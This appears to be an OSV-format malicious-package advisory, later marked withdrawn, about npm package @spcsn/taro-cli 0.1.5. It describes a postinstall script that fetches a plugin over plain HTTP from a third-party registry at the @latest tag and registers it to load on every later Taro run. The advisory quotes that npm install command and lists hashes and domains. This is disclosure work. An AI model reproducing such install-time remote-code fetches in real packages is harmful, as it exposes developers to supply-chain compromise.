{"id":"MAL-2026-4447","summary":"Malicious code in @spcsn/taro-cli (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (10e2baba3a5166ecf1196146e1b2a8771836b25bd7f8d56979e3e277a3de9625)\nThe package's postinstall script probes https://taro.jd.com/ and then invokes its own CLI to run `npm install @jdtaro/plugin-build-report-performance@latest --registry http://registry.m.jd.com` inside the user's global Taro config directory (~/.taro). The plugin is fetched over plain HTTP (no TLS) at the mutable `@latest` tag from a third-party registry (registry.m.jd.com), not from npmjs.org and not from the package's own publisher infrastructure. After install, the plugin name is appended to the global plugins list (`fs.writeJSONSync(configFilePath, { [configKey]: configItem })`), so it is auto-loaded on every subsequent `taro` invocation. This is an unpinned, plain-HTTP, third-party code fetch executed at install time and persisted across future builds — an attacker able to MITM HTTP traffic to registry.m.jd.com (or the registry operator itself, given `@latest`) can substitute arbitrary code that runs whenever the developer later runs Taro. The behavior is undocumented (README is empty) and silently enrolls every installer into a JD-operated build-reporting plugin without consent.\n","modified":"2026-05-27T00:32:05.800718466Z","published":"2026-05-20T10:51:20Z","withdrawn":"2026-05-26T21:14:22Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-05-26T05:50:46.668395095Z","sha256":"10e2baba3a5166ecf1196146e1b2a8771836b25bd7f8d56979e3e277a3de9625","modified_time":"2026-05-20T10:51:20Z","id":"IN-MAL-2026-003517","source":"amazon-inspector","versions":["0.1.5"]},{"source":"amazon-inspector","sha256":"eeb9f5dc682e24a1c04c67e069cb340d1b8d2ef824845cba706d8d85b3f13167","modified_time":"2026-05-20T10:51:20Z","id":"IN-MAL-2026-003518","import_time":"2026-05-26T05:50:46.796387611Z","versions":["0.1.5"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@spcsn/taro-cli/v/0.1.5"}],"affected":[{"package":{"name":"@spcsn/taro-cli","ecosystem":"npm","purl":"pkg:npm/%40spcsn%2Ftaro-cli"},"versions":["0.1.5"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@spcsn/taro-cli/MAL-2026-4447.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"filename":"taro-cli-0.1.5.tgz","hashes":{"sha1":"5fdc18831759bbc37ccdb3914cdf3d01b279cd42","sha512_sri":"sha512-zsr1YnGs09jIxr7/AtA5doG/4yzfxq4My8T+Xyws35RSr3Hmsu3Rj5aws3JytM6butpLcGTyNtf9ZJDBp1eO3w=="}}],"domains":["taro.jd.com","34.6.16.104.in-addr.arpa"],"evidence_files":[{"tlsh":"04f09e3f5ab14123267352b8e97b614b3217829764a8d968f5fd67510fc23401ad31e8","sha256":"b29d7e16632d14cf8ea1277534aaed476a2859fe962b7f278752425cab97d348","path":"postinstall.js"},{"tlsh":"d0f164662afe593201b3106c872f04413a7e67a7510ce94579fce2845f594ea91f3fec","sha256":"4458bd42f8bf2d69f12385a85e01068ce508df371df6e2a4fbc46c23cedd9af2","path":"dist/presets/commands/global-config.js"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}